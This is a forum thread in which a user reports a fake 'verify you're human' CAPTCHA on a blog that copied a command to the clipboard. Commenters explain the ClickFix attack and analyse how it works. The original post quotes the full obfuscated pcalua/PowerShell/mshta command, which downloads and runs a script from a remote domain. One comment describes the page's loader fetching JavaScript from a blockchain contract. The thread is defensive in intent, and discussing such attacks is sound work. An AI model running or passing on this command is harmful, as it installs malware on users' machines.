frontpage.
newsnewestaskshowjobs

Open Source @Github

fp.

Ask HN: Crooked Timber showed showed me a virus captcha, What now?

30•Jgoauh•1h ago•27 comments

Why I prefer Opus 5 to Fable 5

15•novlrdotcom•5h ago•6 comments

Tell HN: Our paid Claude AI subscription unavailable >1 week and no support

39•KellyCriterion•8h ago•19 comments

Ask HN: How do you use Copilot in the CLI, App, and IDE?

2•EspressoGPT•2h ago•1 comments

Can anti-fraud make large-scale attacks unprofitable?

3•jezzwar•4h ago•1 comments

Ask HN: How to rewrite `Claude.md` and install the skill for Opus5 and Fable5

5•hyhmrright•9h ago•5 comments

Ask HN: Thoughts on AMD Ryzen AI MAX+ 395 for Local AI?

2•mempirate•6h ago•2 comments

BMWs shows in-car ads for Spiderman

34•bigmattystyles•21h ago•16 comments

Ask HN: Is there legal risk in AI memory?

2•sarjann•6h ago•0 comments

Internet is no longer accessible?

39•cute_boi•14h ago•23 comments

Ask HN: What do you use local models for?

3•tjomk•8h ago•1 comments

Ask HN: How to deal with security implications of running/installing projects?

12•johng•19h ago•10 comments

Goodbye POSIX, Hello Tea Room: Inside MinervaOS Architecture

10•xentnex•1d ago•6 comments

Claude's code comments – too much or just enough?

8•lalaleslieeeee•13h ago•5 comments

Ask HN: Why is every company encorporating AI everywhere?

24•vanessa1211•1d ago•39 comments

Ask HN: What apps are you building?

13•totaldude87•13h ago•15 comments

Ask HN: What are the most promising RL fields for a new master student?

34•zecice•2d ago•14 comments

Claude Code getting "API Error: 529 Overloaded"

5•croemer•1d ago•2 comments

Messaging platform I can self-host for my agents to communicate

2•giribisthebest•17h ago•3 comments

Ask HN: How do you figure out what you're passionate about?

12•charliebwrites•1d ago•20 comments

Ask HN: Any New Computer Ideas?

8•robalni•1d ago•13 comments

Ask HN: What livestream do you keep open in a tab?

53•missmoss•2d ago•18 comments

Tell HN: Namecheap gave my account to an unverified third party

495•Thrashed•4d ago•177 comments

You've reached the end!

Open in hackernews

Ask HN: Crooked Timber showed showed me a virus captcha, What now?

30•Jgoauh•1h ago
Hello everyone, This morning, as i started my shift, i thought i would start visiting some news blogs / websites to kick off the day. When it got to Crooked Timber i saw a captcha page instead, it looked like a traditional Google captcha. I clicked it, the spinner spun, and a box opened on the right, showing the traditional "Verify you're human" white title on a blue background.

It showed 2 "Manual Verification Steps" : 1. Press Win + R 2. Press Ctrl + V and press Run

At first i assumed it was a new type of captcha checking i a physical keyboard was attached to the browser. But i instantly recognized the attempt to make me run a script on my machine.

I opened a new type and to my surprise, the something new was in my clipboard : "pcalua -a "PowerShell" -c "saps cmd '/v/c m^s^h^t^a h^t^t^p^s^:^/^/fine-work-team.com/6272' -Wi Hi""

I submited it to one of LLMs my work gives me access to, which told me to absolutly not run it (i wasn't planning to) and explained the command would download and run a script from the URL.

How do i protect myself from these scams / hack attempts in the future ? i always tought of myself "prepared" but i was surprised.

Has this happened to you before ? How do you protect yourself ?

Comments

baggachipz•1h ago
> showed showed
ABoltzmannMush•1h ago
Reporting to https://safebrowsing.google.com/safebrowsing/report_phish/, which if their tests reproduce the problem will make most browsers unwilling to load the domain. Generally ether caused by a hacked CMS or bad advertisement.
goodmythical•57m ago
VT says no bueno: https://www.virustotal.com/gui/url/4812564b97c63e1607e9182d0...
everdrive•1h ago
This is called a "ClickFix" attack. There is really _never_ a time when a CAPTCHA will require you to execute code on your machine.

The attack is basically getting someone to accidentally run malicious code.

- ctrl + R brings up the Windows "run" dialogue.

- the code executes a powershell command that reaches out to a remote server

- if successful, the remote server answers and you have installed a dropper or something.

Really, you should never do _anything_ like this for any website. You don't need to protect yourself. This is sort of equivalent (in the strict metaphorical sense) of getting a call from your bank and they ask you for your banking password: you just never do it, no matter what. Same thing here. You don't ever execute code via the run dialogue to solve a CAPTHCA. Never.

https://www.sentinelone.com/blog/how-clickfix-is-weaponizing...

nubinetwork•46m ago
$dayjob just sent out a corporate wide email saying the same thing... I guess it's starting to go around... it's been a while since I've seen a fake website telling people to eg. disable UAC.
tasuki•24m ago
> There is really _never_ a time when a CAPTCHA will require you to execute code on your machine.

I think the concern is the user not knowing they're executing code on their machine.

And as a counterexample: some captchas require you to compute something expensive to prove you're not a llm scraper or whatever. It's normal for captchas to require you to execute code on your machine, it's just usually done within the browser's sandbox.

And anyway, these things are completely incomprehensible to non-technical users.

gus_massa•
sharedptr•1h ago
It’s a typical technique, report it to safe browsing, upload it to VirusTotal, that should be tit flagged quickly
bschne•1h ago
pinged one of the authors on bsky, let's see
joombaga•1h ago
fine-work-team.com has been reported as suspicious. Cloudflare is blocking it now.
netsharc•2m ago
Heh, the URL OP gave returns an MP3 file (starts with hex FF FB), at the end it mentions "LAME3.100" and about half a kilobyte of U's.

It plays in a media player too.

Now watch the people with "overabundance of caution" tell me what I did was stupid...

kstrauser•57m ago
Not directly answering your questions, but I just wanted to say: Great instincts!

You saw something unusual, then

1. Stopped what you were doing.

2. Investigated to see if this was legitimate or malicious.

3. Identified a place to asked others about it.

4. Formulated a good question with enough background information to help people answer it.

All around good job! Well done.

SirFatty•37m ago
5. Paste the entire command on HN so the aspiring script kiddies have a launching point. 6. ? 7. Profit!
kstrauser•14m ago
What’s the Venn diagram of 1) HN users, 2) on Windows, 3) willing to paste something tagged as malware into their own systems to verify?

Given that the asker isn’t experienced enough to know for sure, erring on the side of giving all the information was the right call. If they didn’t, someone would be riding them about “how are we suppose to know if you don’t show us?”.

paulyy_y•33m ago
5. Put the malicious payload directly into work AI system.

"Great instincts!" lmao

kstrauser•16m ago
I do this literally several times a week. “Hey Droid, this looks like malware. What do you make of it?”

It’s the best sandbox I have near at hand for investigating things like that.

SoftTalker•54m ago
> How do i protect myself from these scams / hack attempts in the future

Endless vigilance. Scammers are always working on new tricks. You were rightly suspicious and not fooled by this one.

Good4boothee•53m ago
> How do you protect yourself

Was the site itself actually infected(hacked)? If not, then all you need is adblock (like ublock origin). And that was true for last 20 years.

If website actually got hacked then I don't know of any good solutions. It will be flagged soon or later, and new visitors will be blocked by "Google Safe Browsing". Using something like "Qubes OS" might protect you against attacks based on browser zero-days but VMs don't really protect against ClickFix when people usually share clipboard between host and client VMs.

c0n5pir4cy•48m ago
Do you have any browser extensions enabled?

I've seen similar before where it wasn't the page itself that injected it - rather it was injected by a compromised/sold extension that has permissions on all pages.

deepsummer•20m ago
Not this time. Go to crookedtimber dot org and you can still see it. Just don't follow the instructions... but clean your browser afterwards!

It even supports Macs. But the Mac clipboard content is just "Oops...".

P.S.: even worse: the crookedtimber site itself is infected. No third-party attack. It registers a service worker on the user's browser that stays even when you leave the site. Be sure to clean up the storage data after visiting that site.

c0n5pir4cy•10m ago
I'm not getting it at all! I'm guessing something about my environment has caused it to cloak itself.
confusedbucket•41m ago
> Has this happened to you before ?

Almost, recently. I bought a new Mac, needed something reliable to carry around. I never had a Mac or anything from Apple before, so I wasn't familiar with how exactly does it work. I knew homebrew existed, I understood it's similar to Linux/Windows in that not all applications are in the store, but wasn't familiar at all with how those are commonly installed.

Here's what I did:

1. Open Safari, the only browser there was.

2. Typed "claude mac download" in the search bar (needed Cowork).

3. Clicked the first link.

4. Copied the command it told me to, instructing me to run it in terminal.

Only now I realize that there's something fishy about the command; it had base64 payload in it. Didn't run it and took closer look on the page - it was a Claude share (which I quickly scrolled over).

I can admit mistakes, but Google, Apple and Anthropic deserve some blame here, too.

- Google: pushed malware link up top, didn't (distinctly, at least) mark it as a paid result and I'd swear it didn't show me the URL (which I usually always check before clicking, but maybe I just missed it as the search results are rendered differently from Kagi's)

- Safari: hides path by default, so all you see is "claude.ai". Someone probably thought this looked nice, I think it's just borderline idiotic.

- Anthropic: hosts what's essentially a user-content on their main domain.

Also recently saw a few legit projects using base64 in their install one-liners. Please, stop it.

> How do you protect yourself ?

Installed not Safari and made Google not my default search engine, as I always do. That way I at least always know where I am.

bstsb•31m ago
looking at the source code, the entire phishing page is an iframe created through `srcDoc`. the script itself has no command for Mac users to run, so in my case it just copies "Oops..." to my clipboard - the iframe only loads the first time a user visits the page, after which only a tracking script remains.

it also sets some interesting scripts to your LocalStorage, which are evaluated upon each page load.

the first sends an object to another remote server, { c: <contract address>, e: encrypted base64 blob of basic device info }.

the second calls an API to make said smart contract run the function whose selector is 0xca3348d9, with no parameters, and return the result. the address is 0x58460d0b3d4d6b03761c89120393c0c676676496

edit: this is wildly complex, way more so than a traditional ClickFix attack. it's fetching JS scripts from a Ethereum/Base contract and executing them - i've never seen something like this before. it's got a kill switch too and a cooldown, so i'm no longer experiencing the initial malware dropper on my device "fingerprint"

Retr0id•26m ago
Google is trying to normalize a new "complete the captcha on your phone by scanning a QR code" flow, which I'm sure will be a whole new vector for scams.
iamnothere•16m ago
Can’t wait for the first “scan this code to verify” scam that takes you to a mobile Chrome 0day

Or you could send them to download some spyware/adware Play Store app

OkayPhysicist•3m ago
Couldn't any exploit possible via that pathway also be executed based on a link? I don't see how a QR code makes the situation any worse.
nneonneo•22m ago
This exact technique has been around for a while; there are even government resources warning about it (e.g. https://www.michigan.gov/msp/divisions/intel-ops/cyber/mc3/c... - April 2025).

As you might imagine, these attacks are aimed at less sophisticated users who may have no idea what Win+R even does, and who might be tricked into believing that this actually has anything to do with website verification.

The site you visited -- or one of the resources it depends on -- might have been compromised. If you're enterprising, you could probably determine where the malicious script is getting loaded from by looking in the page source.

19m ago
I've seen sites with similar fake captchas posted twice in the last month by old time regular users. My guess is that the sites were infected after they saw and decide to post it here.

As a workaround, is it possible to disable Ctr+R to add some friction in case I am distracted?